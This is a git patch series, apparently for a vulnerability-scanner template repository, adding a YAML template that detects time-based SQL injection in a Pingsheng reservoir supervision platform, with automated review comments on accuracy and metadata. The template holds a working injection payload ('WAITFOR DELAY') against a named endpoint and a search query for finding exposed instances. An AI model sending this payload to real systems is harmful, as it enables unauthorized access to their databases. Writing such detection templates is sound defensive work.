From 849b0a88b4dff07a0911b93d3f2d4ec517eaa55d Mon Sep 17 00:00:00 2001
From: Kazgangap
Date: Tue, 9 Jul 2024 02:11:54 +0300
Subject: [PATCH 1/3] add pingsheng sqli
---
.../other/pingsheng-electronic-sqli.yaml | 33 +++++++++++++++++++
1 file changed, 33 insertions(+)
create mode 100644 http/vulnerabilities/other/pingsheng-electronic-sqli.yaml
diff --git a/http/vulnerabilities/other/pingsheng-electronic-sqli.yaml b/http/vulnerabilities/other/pingsheng-electronic-sqli.yaml
new file mode 100644
index 0000000000..f69a00a4cd
--- /dev/null
+++ b/http/vulnerabilities/other/pingsheng-electronic-sqli.yaml
@@ -0,0 +1,33 @@
+id: pingsheng-electronic-sqli
+
+info:
+ name: Pingsheng Electronic Reservoir Supervision Platform - Sql Injection
+ author: securityforeveryone
+ severity: critical
+ description: |
+ There is a SQL injection vulnerability in the GetAllRechargeRecordsBySIMCardId interface of Pingsheng Electronic Reservoir Supervision Platform. Attackers can access data in the database without authorization, thereby stealing user data and causing user information leakage.
+ reference:
+ - https://github.com/wy876/POC/blob/main/%E5%B9%B3%E5%8D%87%E7%94%B5%E5%AD%90%E6%B0%B4%E5%BA%93%E7%9B%91%E7%AE%A1%E5%B9%B3%E5%8F%B0GetAllRechargeRecordsBySIMCardId%E6%8E%A5%E5%8F%A3%E5%A4%84%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
+ metadata:
+ verified: true
+ max-request: 1
+ fofa-query: "js/PSExtend.js"
+ tags: sqli,pingsheng
+
+http:
+ - raw:
+ - |
+ @timeout 20s
+ POST /WebServices/SIMMaintainService.asmx/GetAllRechargeRecordsBySIMCardId HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ loginIdentifer=&simcardId=';WAITFOR DELAY '0:0:6'--
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'duration>=6'
+ - 'contains_all(body,"Result","false","Message","?xml version")'
+ - 'status_code == 200'
+ condition: and
From cdd6abec83e2d7457562eec390a8a4db358bc3d3 Mon Sep 17 00:00:00 2001
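Review bot: The matcher `'duration>=6'` is evaluated on a single request under `@timeout 20s`, so a target that is merely slow to answer this POST satisfies it together with the generic `status_code == 200` and body checks, and nothing in `info` tells the operator that a hit is a timing inference rather than a content match. The description should state that, e.g. `Detection is time-based (a six-second delay observed on the GetAllRechargeRecordsBySIMCardId endpoint) and may produce false positives on high-latency targets; confirm manually before reporting.` A `remediation` entry under `info` would also help downstream consumers, e.g. `remediation: Use parameterized queries for the simcardId parameter of GetAllRechargeRecordsBySIMCardId and require authentication on the SIMMaintainService endpoints.` Finally, `name` spells it `Sql Injection` while the repository's other templates generally use `SQL Injection`.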
From: Dhiyaneshwaran
Date: Tue, 9 Jul 2024 15:49:53 +0530
Subject: [PATCH 2/3] minor update
---
http/vulnerabilities/other/pingsheng-electronic-sqli.yaml | 8 +++++---
1 file changed, 5 insertions(+), 3 deletions(-)
diff --git a/http/vulnerabilities/other/pingsheng-electronic-sqli.yaml b/http/vulnerabilities/other/pingsheng-electronic-sqli.yaml
index f69a00a4cd..f17d0dfe2c 100644
--- a/http/vulnerabilities/other/pingsheng-electronic-sqli.yaml
+++ b/http/vulnerabilities/other/pingsheng-electronic-sqli.yaml
@@ -5,11 +5,12 @@ info:
 author: securityforeveryone
 severity: critical
 description: |
- There is a SQL injection vulnerability in the GetAllRechargeRecordsBySIMCardId interface of Pingsheng Electronic Reservoir Supervision Platform. Attackers can access data in the database without authorization, thereby stealing user data and causing user information leakage.
+ There is a SQL injection vulnerability in the GetAllRechargeRecordsBySIMCardId interface of Pingsheng Electronics Reservoir Supervision Platform. An attacker can access the data in the database without authorization, thereby stealing user data and leaking user information.
 reference:
 - https://github.com/wy876/POC/blob/main/%E5%B9%B3%E5%8D%87%E7%94%B5%E5%AD%90%E6%B0%B4%E5%BA%93%E7%9B%91%E7%AE%A1%E5%B9%B3%E5%8F%B0GetAllRechargeRecordsBySIMCardId%E6%8E%A5%E5%8F%A3%E5%A4%84%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
+ - https://github.com/zan8in/pxplan/blob/main/goby_pocs/10-13-crack/redteam_20230316121609/CVD-2022-5560.go
 metadata:
- verified: true
+ verified: "true"
 max-request: 1
 fofa-query: "js/PSExtend.js"
 tags: sqli,pingsheng
@@ -28,6 +29,7 @@ http:
 - type: dsl
 dsl:
 - 'duration>=6'
- - 'contains_all(body,"Result","false","Message","?xml version")'
+ - 'contains_all(body,"Result","false","Message")'
+ - 'contains(content_type,"text/xml")'
 - 'status_code == 200'
 condition: and
From d5ad8ecd14f5e1d47dd02f113d1c0107713f154b Mon Sep 17 00:00:00 2001
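Review bot: The added reference carries the identifier CVD-2022-5560, but that identifier appears nowhere else in the template, so scanner output cannot be correlated with the Goby/CVD entry it is taken from; mention it in `description` or add it under `metadata` so the finding is traceable. The `verified` value also changes from the boolean `true` to the string `"true"`, which are different YAML types — whichever form the repository's metadata tooling expects should be used consistently, so it is worth confirming rather than assuming the quoted form is the convention. The `info` block begins above this hunk.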
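Review bot: The dsl list now mixes operator spacing — the untouched `'duration>=6'` has none while `'status_code == 200'` and the two new lines are spaced — so the expressions read as if written by different authors. Writing the timing check as `'duration >= 6'` makes the four expressions uniform without changing what they evaluate. The enclosing `matchers` block begins above this hunk.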
From: Dhiyaneshwaran
Date: Tue, 9 Jul 2024 15:54:07 +0530
Subject: [PATCH 3/3] update severity
---
http/vulnerabilities/other/pingsheng-electronic-sqli.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/http/vulnerabilities/other/pingsheng-electronic-sqli.yaml b/http/vulnerabilities/other/pingsheng-electronic-sqli.yaml
index f17d0dfe2c..0b14c45d62 100644
--- a/http/vulnerabilities/other/pingsheng-electronic-sqli.yaml
+++ b/http/vulnerabilities/other/pingsheng-electronic-sqli.yaml
@@ -3,7 +3,7 @@ id: pingsheng-electronic-sqli
 info:
 name: Pingsheng Electronic Reservoir Supervision Platform - Sql Injection
 author: securityforeveryone
- severity: critical
+ severity: high
 description: |
 There is a SQL injection vulnerability in the GetAllRechargeRecordsBySIMCardId interface of Pingsheng Electronics Reservoir Supervision Platform. An attacker can access the data in the database without authorization, thereby stealing user data and leaking user information.
 reference:
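Review bot: `severity` drops from critical to high while the description on the following lines still states that an attacker can read database contents without authorization, and the commit message `update severity` gives no rationale, so the two fields now disagree with no record of why. Either the reasoning should be captured where a reader will find it — in the PR description, or as a short comment beside the field such as `# severity: high — <reason placeholder>` — or the description should be revised to match the lower rating. The `info` block continues below this hunk.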